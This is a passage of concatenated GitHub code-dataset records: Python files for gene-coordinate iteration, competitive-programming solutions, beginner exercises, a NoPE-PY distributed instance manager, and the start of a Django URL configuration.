logging.info('Gene coodinates already calculated. skipping')\n pass\n \n\n def xy_groupby_gene_generator(self, gene_order: np.ndarray = None) -> Generator[Tuple[str, np.ndarray, np.ndarray], None, None]:\n \"\"\"Generator function that groups XY coordinates by gene.\n\n Uses the Pandas groupby() function for speed on unsorted numpy arrays.\n\n Yields:\n Iterator[Union[str, np.ndarray, np.ndarray]]: Gene name, X \n coordinates, Y coordinates.\n\n \"\"\"\n df = pd.DataFrame(data = np.column_stack((self.x, self.y, self.gene)), columns = [self.x_label, self.y_label, self.gene_label])\n grouped = df.groupby(self.gene_label)\n \n if not isinstance(gene_order, np.ndarray):\n gene_order = self.unique_genes\n \n for g in gene_order:\n data = grouped.get_group(g)\n yield g, data.loc[:, self.x_label].to_numpy(), data.loc[:, self.y_label].to_numpy()\n\n def make_pandas(self):\n pandas_df = pd.DataFrame(data = np.column_stack([self.x, self.y, self.gene]), columns = [self.x_label, self.y_label, self.gene_label])\n return pandas_df\n \n @lru_cache(maxsize=None)\n def _make_xy_coordinates(self):\n return {g: np.column_stack((x, y)).astype('float32') for g, x, y in self.xy_groupby_gene_generator()}\n \n def _make_xyz_coordinates(self):\n return {g: np.column_stack((xy, np.array([self.z_offset]*xy.shape[0]))).astype('float32') for g, xy in self._make_xy_coordinates().items()}\n\n def make_gene_coordinates(self, save_z = False) -> None:\n \"\"\"Make a dictionary with point coordinates for each gene.\n\n Output will be in self.gene_coordinates. Output will be cached so that\n this function can be called many times but the calculation is only\n performed the first time.\n\n \"\"\"\n if save_z:\n self.gene_coordinates = self._make_xyz_coordinates()\n else:\n self.gene_coordinates = self._make_xy_coordinates()\n \n\n\n\nclass MultiIteration(Iteration):\n\n def make_multi_gene_coordinates(self, n_jobs=None) -> None:\n\n #if n_jobs == None:\n # n_jobs = self.cpu_count\n\n for d in self.datasets:\n d.make_gene_coordinates()\n\n #with Parallel(n_jobs=n_jobs, backend='loky') as parallel:\n # parallel(delayed(d.make_gene_coordinates) for d in self.datasets)\n\n","repo_name":"linnarsson-lab/FISHscale","sub_path":"FISHscale/utils/fast_iteration.py","file_name":"fast_iteration.py","file_ext":"py","file_size_in_byte":8427,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"40"} +{"seq_id":"38005703578","text":"def getfail(P):\n n = len(P)\n i = 1\n j = 0\n f = [0 for _ in range(n)]\n while i < n:\n while j and P[i] != P[j]:\n j = f[j - 1]\n if P[i] == P[j]:\n j += 1\n f[i] = j\n i += 1\n return f\n\ndef pow1(a, b):\n r = 1\n while b != 0:\n if b & 1:\n r = r * a\n a = a * a\n b >>= 1\n return r\n\ndef fibo(n):\n global dp\n if dp[n] != -1:\n return dp[n]\n dp[n] = (fibo(n-1) << len(str(format(fibo(n-2), 'b')))) + fibo(n-2)\n return dp[n]\n \ndp = [0, 1] + [-1 for i in range(99)]\nn = int(input())\nprint(fibo(n))\n","repo_name":"witoru/many_things","sub_path":"boj/4206.py","file_name":"4206.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2337758803","text":"import re\n\ndef fizzbuzz(n):\n result = []\n\n for i in range(1, n + 1):\n if i % 5 == 0 and i % 3 == 0:\n result.append('FizzBuzz')\n elif i % 5 == 0:\n result.append('Buzz')\n elif i % 3 == 0:\n result.append('Fizz')\n else:\n result.append(i)\n \n return result\n\n\nprint(fizzbuzz(15))\n\nregex = '^[a-z]+[_]?[-]?[a-z0-9]+[@]\\w+[.]\\w{2,3}$'\n\ndef check_email(email):\n if (re.search(regex, email)):\n print('Valid')\n else:\n print('Invalid')\n\n\nprint('maybsalvalaio@gmail.com')\ncheck_email('maybsalvalaio@gmail.com')\nprint('12teste@lalaa.com')\ncheck_email('12teste@lalaa.com')\nprint('test.test@oiwer.com')\ncheck_email('test.test@oiwer.com')\nprint('ueh_ewjhr@sjh.ais')\ncheck_email('ueh_ewjhr@sjh.ais')\nprint('ueh-ewjhr@sjh.ais')\ncheck_email('ueh-ewjhr@sjh.ais')\nprint('uehwjhr@sjh.aidfs')\ncheck_email('uehwjhr@sjh.aidfs')","repo_name":"Maysa-B/trybe-exercicios","sub_path":"ciencia-da-computacao/bloco-32/dia-3/exercicios.py","file_name":"exercicios.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"39328121028","text":"def solution(n, lost, reserve):\n lost, reserve = initialize(lost, reserve)\n answer = n - len(lost)\n for lost_student in lost:\n if can_borrow_from_left(lost_student, reserve):\n reserve.remove(lost_student - 1)\n answer += 1\n elif can_borrow_from_right(lost_student, reserve, n):\n reserve.remove(lost_student + 1)\n answer += 1\n return answer\n\n\ndef initialize(lost, reserve):\n new_lost, new_reserve = lost[:], reserve[:]\n for lost_element in lost:\n if lost_element in reserve:\n new_lost.remove(lost_element)\n new_reserve.remove(lost_element)\n new_lost.sort()\n new_reserve.sort()\n return new_lost, new_reserve\n\n\ndef can_borrow_from_left(student, reserve):\n if student == 1:\n return False\n return student - 1 in reserve\n\n\ndef can_borrow_from_right(student, reserve, n):\n if student == n:\n return False\n return student + 1 in reserve\n","repo_name":"Junroot/Algorithm","sub_path":"programmers/42862.py","file_name":"42862.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1837989090","text":"#!/usr/bin/env python\n# @author Martin Karkowski\n# @email m.karkowski@zema.de\n\nimport asyncio\nimport json\n\nfrom nope.communication.bridge import Bridge\nfrom nope.dispatcher.connectivityManager import NopeConnectivityManager\nfrom nope.dispatcher.rpcManager import NopeRpcManager\nfrom nope.helpers import SPLITCHAR, ensureDottedAccess, generateId, isIterable, EXECUTOR, waitFor, varifyPath, formatException\nfrom nope.logger import defineNopeLogger\nfrom nope.merging import DictBasedMergeData\nfrom nope.modules import NopeGenericModule\nfrom nope.observable import NopeObservable\n\n\nclass NopeInstanceManager:\n\n def __init__(self, options, _defaultSelector, _id=None,\n _connectivityManager=None, _rpcManager=None, _core=None):\n\n self.options = options\n self._defaultSelector = _defaultSelector\n self._id = _id\n self._connectivityManager = _connectivityManager\n self._rpcManager = _rpcManager\n self._core = _core\n self._communicator: Bridge = options.communicator\n self.__disposed = False\n\n if _id is None:\n self._id = generateId()\n if _connectivityManager is None:\n self._connectivityManager = NopeConnectivityManager(\n options, id=self._id)\n if _rpcManager is None:\n self._rpcManager = NopeRpcManager(\n options,\n self._defaultSelector,\n id=self._id,\n connectivityManager=self._connectivityManager\n )\n\n self._logger = defineNopeLogger(\n options.logger, 'core.instance-manager')\n\n # Flag to indicate, that the system is ready.\n self.ready = NopeObservable()\n self.ready.setContent(False)\n\n self._mappingOfRemoteDispatchersAndGenerators = dict()\n # Overview of the available Constructors in the network.\n self.constructors = DictBasedMergeData(\n self._mappingOfRemoteDispatchersAndGenerators, '+', '+')\n self._mappingOfRemoteDispatchersAndInstances = dict()\n\n # Overview of the available instances in the network.\n # - OriginalKey = DispatcherID (string);\n # - OriginalValue = Available Instance Messages (IAvailableInstancesMsg);\n # - ExtractedKey = The name of the Instance (string);\n # - ExtractedValue = instance-description (INopeModuleDescription);\n self.instances = DictBasedMergeData(\n self._mappingOfRemoteDispatchersAndInstances, 'instances/+', 'instances/+/identifier')\n\n self._internalWrapperGenerators = dict()\n self._registeredConstructors = dict()\n self._instances = dict()\n self._externalInstances = dict()\n self._internalInstances = set()\n self._initializingInstance = dict()\n self._externalInstancesNames = set()\n\n # Contains the identifiers of the instances, which are hosted in the\n # provided dispatcher.\n self.internalInstances = NopeObservable()\n self.internalInstances.setContent([])\n\n self.constructorServices = NopeObservable()\n self.constructorServices.setContent([])\n\n _ctorStart = f'nope{SPLITCHAR}core{SPLITCHAR}constructor{SPLITCHAR}'\n\n def _extractGenerators(*args):\n\n constructorServices = set()\n\n self._mappingOfRemoteDispatchersAndGenerators.clear()\n for dispatcher, services in self._rpcManager.services.originalData.items():\n def _filterMatchingServices(svc):\n if \"id\" in svc and svc.id.startswith(_ctorStart):\n constructorServices.add(svc[\"id\"])\n return True\n return False\n\n generators = list(\n map(\n lambda item: item.id[len(_ctorStart):],\n filter(\n _filterMatchingServices,\n services.services\n )\n )\n )\n\n if len(generators):\n self._mappingOfRemoteDispatchersAndGenerators[dispatcher] = generators\n\n self.constructorServices.setContent(list(constructorServices))\n self.constructors.update()\n\n # Subscribe to changes.\n self._rpcManager.services.data.subscribe(_extractGenerators)\n\n if self._logger:\n self._logger.info('core.instance-manager online')\n\n self.reset()\n EXECUTOR.callParallel(self._init)\n\n async def _sendAvailableInstances(self):\n # Update the Instances provided by this module.\n await self._communicator.emit(\n \"instancesChanged\",\n {\n \"dispatcher\": self._id,\n # We will send the descriptions.\n # Generate the Module Description for every identifier:\n \"instances\": list(\n map(lambda item: self._instances[item][\"instance\"].toDescription(), self._internalInstances))\n }\n )\n\n # Update the Instances\n self.internalInstances.setContent(list(self._internalInstances))\n\n async def _init(self):\n\n await self._communicator.connected.waitFor()\n await self._connectivityManager.ready.waitFor()\n await self._rpcManager.ready.waitFor()\n\n async def _generateWrapper(dispather, description):\n mod = NopeGenericModule(\n dispather,\n # self._generateEmitter,\n # self._generateObservable\n )\n await mod.fromDescription(description, \"overwrite\")\n return mod\n\n self.registerInternalWrapperGenerator(\n \"*\",\n _generateWrapper\n )\n\n def _onDispatchersChanged(changes, *args):\n \"\"\" Callback which will handle new and offline Dispatchers.\n \"\"\"\n\n if len(changes.added):\n # If there are dispatchers online,\n # We will emit our available services.\n EXECUTOR.callParallel(self._sendAvailableInstances)\n\n if len(changes.removed):\n # Remove the dispatchers.\n for removedId in changes.removed:\n self.removeDispatcher(removedId)\n\n # We will use our status-manager to listen to changes.\n self._connectivityManager.dispatchers.onChange.subscribe(\n _onDispatchersChanged)\n\n # Make shure we are emitting the instances provided.\n await self._communicator.on(\"bonjour\", lambda *args: EXECUTOR.callParallel(self._sendAvailableInstances))\n\n def _onInstancesChanged(message, *args):\n \"\"\" Callback which will be called if the commincator receives a Message\n that some instances has been changed.\n\n Args:\n message: The Message from the System.\n \"\"\"\n # Store the instance.\n self._mappingOfRemoteDispatchersAndInstances[message.dispatcher] = message\n\n # Update the Mapping\n self.instances.update()\n\n if self._logger:\n self._logger.debug(\n 'Remote Dispatcher \"' + str(message.dispatcher) + '\" updated its available instances')\n\n # Listen to the Changes.\n await self._communicator.on(\"instancesChanged\", _onInstancesChanged)\n\n if self._logger:\n self._logger.debug(\"core.instance-manager \" +\n str(self._id) + \" initialized\")\n\n self.ready.setContent(True)\n\n def getServiceName(self, name: str, type: str) -> str:\n \"\"\" Helper to get the corresponding Service name\n\n Args:\n name (str): Name of the Service\n _type (str): The desired type of the requested service name. Could be \"dispose\" or \"constructor\"\n\n Returns:\n str: The Adapted Name\n \"\"\"\n if type == \"constructor\":\n return f\"nope{SPLITCHAR}core{SPLITCHAR}constructor{SPLITCHAR}{name}\"\n elif type == \"dispose\":\n return f\"nope{SPLITCHAR}core{SPLITCHAR}destructor{SPLITCHAR}{name}\"\n else:\n raise Exception(\"The given type is not correct.\")\n\n def _getInstanceInfo(self, identifier: str):\n \"\"\" Function, that will extract the information of the instance and the providing dispatcher.\n\n Args:\n identifier (str): The identifier of instance\n \"\"\"\n # First check if the instance exists.\n if not self.instanceExists(identifier, False):\n return None\n\n ret = ensureDottedAccess({})\n\n # First we check if we are taking care of an internal instance, if so\n # we will use this instance to enrich the description, otherwise, we\n # will look in the external instances.\n if identifier in self._instances:\n ret.description = self._instances[identifier].instance.toDescription(\n )\n else:\n for item in self._mappingOfRemoteDispatchersAndInstances.values():\n instances = item.instances\n\n for instance in instances:\n if instance.identifier == identifier:\n ret.description = instance\n break\n\n ret.dispatcher = self.getManagerOfInstance(identifier)\n\n return ret\n\n def removeDispatcher(self, dispatcher: str):\n \"\"\" Helper to remove a dispatcher.\n\n Args:\n dispatcher (str): The Id of the Dispatcher\n \"\"\"\n if self._mappingOfRemoteDispatchersAndInstances.pop(dispatcher, False):\n self.instances.update()\n\n async def registerConstructor(self, identifier: str, cb):\n \"\"\" Registers a Constructor, that enables other NopeInstanceManagers to create an instance of the given type. Therefore a callback \"cb\" is registered with the given \"typeIdentifier\"\n\n Args:\n identifier (str): The identifier for the Constructor (Like a service)\n cb (function): The callback used, to create an instance. The Callback receives the following parameters (NopeCore, identifier:str)\n \"\"\"\n\n if self._logger:\n self._logger.debug(\n 'Adding instance generator for \"' + (identifier +\n '\" to external Generators. Other Elements can now create instances of self type.'\n ))\n\n async def createInstance(data):\n\n # Check if an instance exists or not.\n # if not => create an instance an store it.\n\n if data.identifier not in self._instances:\n hashableData = [data.identifier, data.params, data.type]\n try:\n hashed = hash(hashableData)\n except BaseException as E:\n hashed = json.dumps(hashableData)\n\n # It might happen, that an instance is requested multiple times.\n # therefore we have to make shure, we wont create them multiple times:\n # We will test it by using the \"_internalInstances\" set\n\n if data.identifier not in self._initializingInstance:\n\n try:\n\n # Mark the Instance as available.\n self._initializingInstance[data.identifier] = hashed\n\n # Create the Instance\n _instance = await cb(self._core, data.identifier)\n _instance.identifier = data.identifier\n\n # Make shure the Data is expressed as Array.\n if not isIterable(data.params):\n data.params = [data.params]\n\n # Initialize the instance with the parameters.\n await _instance.init(*data.params)\n\n async def disposeInstance(_data):\n \"\"\" A Function is registered, taking care of removing\n an instances, if it isnt needed any more.\n\n Args:\n _data (msg): The message containing the dispatcher id.\n \"\"\"\n\n _data = ensureDottedAccess(_data)\n\n if self._instances.get(data.identifier).usedBy:\n try:\n\n if _data.dispatcherId in self._instances.get(\n data.identifier).usedBy:\n # Pop the dispatcher if it is present:\n idx = self._instances.get(\n data.identifier).usedBy.index(\n _data.dispatcherId)\n self._instances.get(\n data.identifier).usedBy.pop(idx)\n\n if len(self._instances.get(\n data.identifier).usedBy) == 0:\n # Unmark as internal instance\n self._internalInstances.remove(\n data.identifier)\n # Remove the Instance.\n await _instance.dispose()\n # Removes the instances\n self._instances.pop(data.identifier)\n # Remove the Function itself\n await self._rpcManager.unregisterService(self.getServiceName(data.identifier, 'dispose'))\n # Emit the instances again\n await self._sendAvailableInstances()\n\n except ValueError:\n pass\n\n # A Function is registered, taking care of removing\n # an instances, if it isnt needed any more.\n await self._rpcManager.registerService(\n disposeInstance,\n ensureDottedAccess({\n 'id': self.getServiceName(data.identifier, 'dispose'),\n 'schema': ensureDottedAccess({\n 'description': f'Service, which will destructor for the instance \"{data.identifier}\". This function will be called internal only.',\n 'type': 'function'})\n })\n )\n\n # Store the Instance.\n self._instances[data.identifier] = ensureDottedAccess({\n 'instance': _instance,\n 'usedBy': [data.dispatcherId]\n })\n\n self._internalInstances.add(data.identifier)\n\n # Update the available instances:\n await self._sendAvailableInstances()\n\n # Make shure, we remove this instance.hash\n self._initializingInstance.pop(data.identifier)\n\n except BaseException as E:\n # Make shure, we remove this instance.hash\n self._initializingInstance.pop(data.identifier)\n\n raise E\n\n elif self._initializingInstance.get(data.identifier) != hashed:\n raise Exception(\n 'Providing different Parameters for the same Identifier'\n )\n else:\n # Check if the Instance is ready.\n firstHint = True\n\n def checker():\n nonlocal firstHint\n if firstHint:\n self._logger.warn(\n f'Parallel request for the same Instance \"{data.identifier}\" => Waiting until the Instance has been initialized')\n firstHint = False\n return data.identifier in self._instances\n\n await waitFor(\n checker,\n ensureDottedAccess({\n 'testFirst': True,\n 'delay': 100\n })\n )\n else:\n # If an Element exists => Add the Element.\n self._instances.get(data.identifier).usedBy.append(\n data.dispatcherId)\n\n # Define the Response.\n response = ensureDottedAccess({\n 'description': self._instances.get(data.identifier).instance.toDescription(),\n 'type': data.type\n })\n\n # Send the Response\n return response\n\n _cb = await self._rpcManager.registerService(\n createInstance,\n ensureDottedAccess({\n # We will add the Name to our service.\n 'id': self.getServiceName(identifier, 'constructor'),\n # We dont want to have a Prefix for construcors\n 'addNopeServiceIdPrefix': False,\n 'schema': ensureDottedAccess({\n 'description': f'Service, which will create an construtor for the type \"{identifier}\".',\n 'type': 'function'\n })\n })\n )\n\n # Store a generator\n self._registeredConstructors[identifier] = _cb\n\n async def unregisterConstructor(self, identifier: str):\n \"\"\" Unregisters a present Constructor. After this, created instances are still valid, the user isnt able to create new ones.\n\n Args:\n identifier (str): The identifier for the Constructor (Like a service)\n \"\"\"\n if identifier in self._registeredConstructors:\n if self._logger:\n self._logger.debug('Removing instance generator for \"' + identifier +\n '\" from external Generators. Other Elements cant create instances of self type anymore.')\n\n # We will just unregister the service from our\n # system. Therefore we just use the rpcManager\n\n await self._rpcManager.unregisterService(self._registeredConstructors.get(identifier))\n self._registeredConstructors.pop(identifier)\n\n def registerInternalWrapperGenerator(self, identifier: str, cb):\n \"\"\" Defaultly a generic wrapper will be returned, when an instance is created. you\n can specifiy specific wrapper type for different \"typeIdentifier\" with this method.\n\n Args:\n identifier (str): The identifier for the Constructor (Like a service)\n cb (function): The Callback which creates the specific wrapper.\n \"\"\"\n if self._logger:\n self._logger.debug('Adding instance generator for \"' + identifier +\n '\" as internal Generator. This Generator wont be used externally.')\n\n self._internalWrapperGenerators[identifier] = cb\n\n def unregisterInternalWrapperGenerator(self, identifier: str):\n \"\"\" Removes a specific generator for for a wrapper.\n\n Args:\n identifier (str): The identifier for the Constructor (Like a service)\n \"\"\"\n if self._logger:\n self._logger.debug('Rmoving instance generator for \"' + identifier +\n '\" from internal Generator. The sytem cant create elements of self type any more.')\n\n self._internalWrapperGenerators.pop(identifier)\n\n def instanceExists(self, identifier: str, externalOnly=True) -> bool:\n \"\"\" Helper, to test if an instance with the given identifier exists or not.\n\n Args:\n identifier (str): identifier of the instance.\n externalOnly (bool, optional): If set to true we will only look for external instances in the external dispatchers. Defaults to True.\n\n Returns:\n bool: The Testresult\n \"\"\"\n if identifier not in self.instances.simplified:\n return False\n\n if externalOnly:\n manager = self.getManagerOfInstance(identifier)\n return manager[\"id\"] != self._id\n\n return True\n\n def getManagerOfInstance(self, identifier: str):\n \"\"\" Returns the hosting dispatcher for the given instance.\n\n Args:\n identifier (str): The identifier for instance (its name)\n\n Returns:\n INopeStatusInfo | False: The Status or false if not present.\n \"\"\"\n # First we will check if the instance is available internally\n if identifier in self._internalInstances:\n return self._connectivityManager.info\n\n # If that isnt the case, we will check all dispatchers and search the\n # instance.\n for iter_item in self._mappingOfRemoteDispatchersAndInstances.items():\n dispatcher = iter_item[0]\n msg = iter_item[1]\n for instance in msg.instances:\n if instance.identifier == identifier:\n return self._connectivityManager.getStatus(dispatcher)\n\n return None\n\n def getInstanceDescription(self, instanceIdentifier: str):\n \"\"\" Returns the instance Description for a specific instance. It is just a simplified wrapper\n for the \"instances\"-property.\n\n Args:\n instanceIdentifier (str): The identifier for instance (its name)\n\n Returns:\n INopeModuleDescription | False: The Description or False if not found.\n \"\"\"\n if instanceIdentifier in self._instances:\n return self._instances.get(\n instanceIdentifier).instance.toDescription()\n\n for data in self._mappingOfRemoteDispatchersAndInstances.values():\n instances = data.get(\"instances\", [])\n for instance in instances:\n if instance[\"identifier\"] == instanceIdentifier:\n return instance\n\n return False\n\n def constructorExists(self, typeIdentifier: str) -> bool:\n \"\"\" Helper to test if a constructor linkt to the provided \"typeIdentifier\" exists or not.\n\n Args:\n typeIdentifier (str): The identifier for the Constructor (Like a service)\n\n Returns:\n bool: _description_\n \"\"\"\n return typeIdentifier in self.constructors.data.getContent()\n\n async def createInstance(self, description, options=None):\n \"\"\" Allows to create an instance. This might be the case on remote dispatchers or\n on the same element. Only a wrapper is returned, which communicates with a\n dispatcher, because we dont know where the element is provided. You can use the\n method \"getDispatcherForInstance\" to determine the dispatcher running the instance.\n\n The returned wrapper acts like a normal \"internal\" class.\n\n Args:\n description (dict-like): Description of the instance to be created\n options (dict-like, optional): Options used during creating the instance.. Defaults to None.\n\n\n Returns:\n NopeGenericModule | Registered Wrapper: An Generic Nope Module as Wrapper or a custom wrapper for the class.\n \"\"\"\n\n # Define the Default Description\n # which will lead to an error.\n\n options = ensureDottedAccess(options)\n description = ensureDottedAccess(description)\n\n # Assign the provided Description\n _description = ensureDottedAccess({\n 'dispatcherId': self._id,\n 'identifier': 'error',\n 'params': [],\n 'type': 'unkown'\n })\n _description.update(description)\n _description.update({'dispatcherId': self._id})\n\n # Check if the Description is complete\n if (_description.type == 'unkown' or _description.identifier) == 'error':\n raise Exception(\n 'Please Provide at least a \"type\" and \"identifier\" in the paremeters')\n\n # Use the varified Name (removes the invalid chars.)\n _description.identifier = varifyPath(\n _description.identifier) if self.options.forceUsingValidVarNames else _description.identifier\n if self._logger:\n self._logger.debug('Requesting an Instance of type: \"' + _description.type +\n '\" with the identifier: \"' + str(_description.identifier) + '\"')\n\n try:\n _type = _description.type\n if _type not in self._internalWrapperGenerators:\n _type = '*'\n\n if not self.constructorExists(_description.type):\n # No default type is present for a remote\n # => assing the default type which is \"*\"\"\n raise Exception('Generator \"' + _description.type +\n '\" isnt present in the network!')\n if _type in self._internalWrapperGenerators:\n if self._logger:\n self._logger.debug('No instance with the identifiert: \"' + str(_description.identifier) +\n '\" found, but an internal generator is available. Using the internal one for creating the instance and requesting the \"real\" instance externally')\n\n # Now test if there is allready an instance with this name and type.\n # If so, we check if we have the correct type etc. Additionally we\n # try to extract its dispatcher-id and will use that as selector\n # to allow the function be called.\n\n _instanceDetails = self._getInstanceInfo(\n _description.identifier)\n\n usedDispatcher = None\n\n if _instanceDetails is not None and _instanceDetails.description.type != _description.type:\n raise Exception(\n \"There exists an Instance named: '\" + str(_description.identifier) + \"' but it uses a different type. Requested type: '\" +\n _description.type + \"', given type: '\" + str(_instanceDetails.description.type) + \"'\")\n\n elif _instanceDetails is not None:\n usedDispatcher = _instanceDetails.dispatcher.id\n\n if usedDispatcher and options.assignmentValid:\n\n # If we have an dispatcher, which was been used to create the instance,\n # we have to check, the selected Dispatcher Matches our\n # criteria.\n\n if not await options.assignmentValid(_instanceDetails.description, _instanceDetails.dispatcher):\n raise Exception('Assignment is invalid.')\n\n definedInstance = await self._rpcManager.performCall(\n self.getServiceName(_description.type, 'constructor'),\n [\n _description\n ],\n options\n )\n\n if self._logger:\n self._logger.debug(\n f'Received a description for the instance \"{definedInstance.description.identifier}\"')\n\n # Create the Wrapper for our instance.\n wrapper = await self._internalWrapperGenerators.get(_type)(self._core, definedInstance.description)\n if self._logger:\n self._logger.debug(\n f'Created a Wrapper for the instance \"{definedInstance.description.identifier}\"')\n\n originalDispose = wrapper.dispose\n\n async def dispose():\n await self.deleteInstance(wrapper.identifier)\n\n await originalDispose()\n\n setattr(wrapper, \"dispose\", dispose)\n\n self._instances[_description.identifier] = ensureDottedAccess({\n 'instance': wrapper,\n 'usedBy': [\n _description.dispatcherId\n ]\n }\n )\n\n return wrapper\n\n raise Exception('No internal generator Available!')\n\n except Exception as e:\n\n if self._logger:\n self._logger.error(\n 'During creating an Instance, the following error Occurd')\n self._logger.error(formatException(e))\n\n raise e\n\n async def generateWrapper(self, description):\n # Define the Default Description\n # which will lead to an error.\n description = ensureDottedAccess(description)\n\n # Assign the provided Description\n _description = ensureDottedAccess({\n 'dispatcherId': self._id,\n 'identifier': 'error',\n 'params': [],\n 'type': 'unkown'\n })\n _description.update(description)\n _description.update({'dispatcherId': self._id})\n\n # Check if the Description is complete\n if (_description.type == 'unkown' or _description.identifier) == 'error':\n raise Exception(\n 'Please Provide at least a \"type\" and \"identifier\" in the paremeters')\n\n # Use the varified Name (removes the invalid chars.)\n _description.identifier = varifyPath(\n _description.identifier) if self.options.forceUsingValidVarNames else _description.identifier\n if self._logger:\n self._logger.debug('Requesting an Instance of type: \"' + _description.type +\n '\" with the identifier: \"' + str(_description.identifier) + '\"')\n\n try:\n _type = _description.type\n if _type not in self._internalWrapperGenerators:\n _type = '*'\n\n if not self.constructorExists(_description.type):\n # No default type is present for a remote\n # => assing the default type which is \"*\"\"\n raise Exception('Generator \"' + _description.type +\n '\" isnt present in the network!')\n if _type in self._internalWrapperGenerators:\n if self._logger:\n self._logger.debug('No instance with the identifiert: \"' + str(_description.identifier) +\n '\" found, but an internal generator is available. Using the internal one for creating the instance and requesting the \"real\" instance externally')\n\n # Now test if there is allready an instance with this name and type.\n # If so, we check if we have the correct type etc. Additionally we\n # try to extract its dispatcher-id and will use that as selector\n # to allow the function be called.\n\n _instanceDetails = self._getInstanceInfo(\n _description.identifier)\n\n if _instanceDetails is not None and _instanceDetails.description.type != _description.type:\n raise Exception(\n \"There exists an Instance named: '\" + str(_description.identifier) + \"' but it uses a different type. Requested type: '\" +\n _description.type + \"', given type: '\" + str(_instanceDetails.description.type) + \"'\")\n\n elif _instanceDetails is None:\n raise Exception(\n 'No instance known with the idenfitier \"' + str(_description.identifier) + '\" !')\n\n definedInstance = _instanceDetails.description\n\n # Create the Wrapper for our instance.\n wrapper = await self._internalWrapperGenerators.get(_type)(self._core, definedInstance.description)\n if self._logger:\n self._logger.debug(\n f'Created a Wrapper for the instance \"{definedInstance.description.identifier}\"')\n\n originalDispose = wrapper.dispose\n\n async def dispose():\n await self.deleteInstance(wrapper.indentifier)\n\n await originalDispose()\n\n setattr(wrapper, \"dispose\", dispose)\n\n self._instances[_description.identifier] = ensureDottedAccess({\n 'instance': wrapper,\n 'usedBy': [\n _description.dispatcherId\n ]\n }\n )\n\n return wrapper\n\n raise Exception('No internal generator Available!')\n\n except Exception as e:\n\n if self._logger:\n self._logger.error(\n 'During creating an Instance, the following error Occurd')\n self._logger.error(formatException(e))\n\n raise e\n\n async def registerInstance(self, instance):\n \"\"\" Option, to statically register an instance, without using an specific generator etc.\n This instance is just present in the network.\n\n Args:\n instance (INopeInstance): The Instnce to register\n\n Returns:\n INopeInstance: The instance.\n \"\"\"\n self._instances[instance.identifier] = ensureDottedAccess({\n 'instance': instance,\n 'usedBy': [],\n 'manual': True\n }\n )\n\n self._internalInstances.add(instance.identifier)\n\n await self._sendAvailableInstances()\n\n return instance\n\n async def deleteInstance(self, instance, preventSendingUpdate=False) -> bool:\n \"\"\" Disposes an instance and removes it. Thereby the Instance wont be available for other\n InstanceManagers in the system.\n\n Args:\n instance (any): The Instance to consider\n preventSendingUpdate (bool, optional): If set to True the other systems wont be notified. This is for internal purpose only. Defaults to False.\n\n Returns:\n bool: The success\n \"\"\"\n # Block to find the instance.\n # Based on the property (string or instance)\n # the corresponding instance object has to be select.\n\n _instance = None\n _identifier = None\n\n if isinstance(instance, str):\n _instance = self._instances.get(instance)\n _identifier = instance\n else:\n for data in self._instances.values():\n if instance == data.instance:\n _instance = data\n _identifier = data.instance.identifier\n break\n try:\n params = ensureDottedAccess({\n 'dispatcherId': self._id,\n 'identifier': _identifier\n })\n\n # Call the corresponding Dispose Function for the \"real\" instance\n # All other elements are just accessors.\n await self._rpcManager.performCall(\n self.getServiceName(_identifier, \"dispose\"),\n [\n params\n ]\n )\n except BaseException as E:\n # Only if it is an internal\n # Instance, we do not want to\n # throw that error, otherwise\n # we want that error to be\n # present.\n if _instance:\n pass\n else:\n raise E\n\n # if the instance has been found => delete the instance.\n if _instance:\n _instance.usedBy.pop()\n if len(_instance.usedBy) == 0:\n\n # Delete the Identifier\n self._instances.pop(_instance.instance.identifier)\n\n # Check if an update should be emitted or not.\n if not preventSendingUpdate:\n # Update the Instances provided by this module.\n await self._sendAvailableInstances()\n\n return True\n return False\n\n async def getInstancesOfType(self, typeToGet: str):\n \"\"\" Creates Wrappers for the Type of the given element.\n\n Args:\n typeToGet (str): Type of the instances to get the wrappers for.\n\n Returns:\n list: List containing all kown Elements of the given type.\n \"\"\"\n\n indentifier = map(lambda item: item.identifier, filter(\n lambda item: item.type == typeToGet, self.instances.data.getContent()))\n\n promises = []\n\n for identifier in indentifier:\n promises.append(\n self.createInstance(\n ensureDottedAccess({\n 'identifier': identifier,\n 'type': typeToGet,\n 'params': []\n })\n )\n )\n\n # Wait to generate all Instances.\n if promises:\n result = await asyncio.gather(*promises)\n return result\n\n def reset(self):\n self._mappingOfRemoteDispatchersAndGenerators.clear()\n self._mappingOfRemoteDispatchersAndInstances.clear()\n self.constructors.update()\n self.instances.update()\n self._internalWrapperGenerators = dict()\n self._registeredConstructors = dict()\n\n # If Instances Exists => Delete them.\n if self._instances:\n\n promises = []\n\n # Dispose all Instances.\n for name, instance in self._instances.items():\n\n def onDone(p):\n if p.exception() and self._logger:\n self._logger.error(\n 'Failed Removing Instance \"' + name + '\"')\n self._logger.error(formatException(e))\n\n promise: asyncio.Future = self.deleteInstance(name, True)\n promise.add_done_callback(onDone)\n\n if self._logger:\n self._logger.warn('Disposing instance \"' + name + '\"')\n\n promises.append(promise)\n\n EXECUTOR.callParallel(asyncio.gather, *promises)\n\n self._instances = dict()\n self._externalInstances = dict()\n self._internalInstances = set()\n self._initializingInstance = dict()\n self._externalInstancesNames = set()\n self.internalInstances.setContent([])\n\n if self._communicator.connected.getContent():\n EXECUTOR.callParallel(self._sendAvailableInstances)\n\n async def dispose(self):\n self.reset()\n self.instances.dispose()\n self.__disposed = True\n\n def __del__(self):\n if not self.__disposed:\n EXECUTOR.callParallel(self.dispose)\n","repo_name":"ZeMA-gGmbH/NoPE-PY","sub_path":"nope/dispatcher/instanceManager/instanceManager.py","file_name":"instanceManager.py","file_ext":"py","file_size_in_byte":38653,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"19782104904","text":"from django.urls import path\r\nfrom .views import *\r\nfrom django.contrib.auth.views import LogoutView\r\n\r\nurlpatterns = [\r\n path('login/', CustomLoginView.as_view(), name='login'),\r\n path('logout/', LogoutView.as_view(next_page='login'), name='logout'),\r\n path('register/', RegisterView.as_view(), 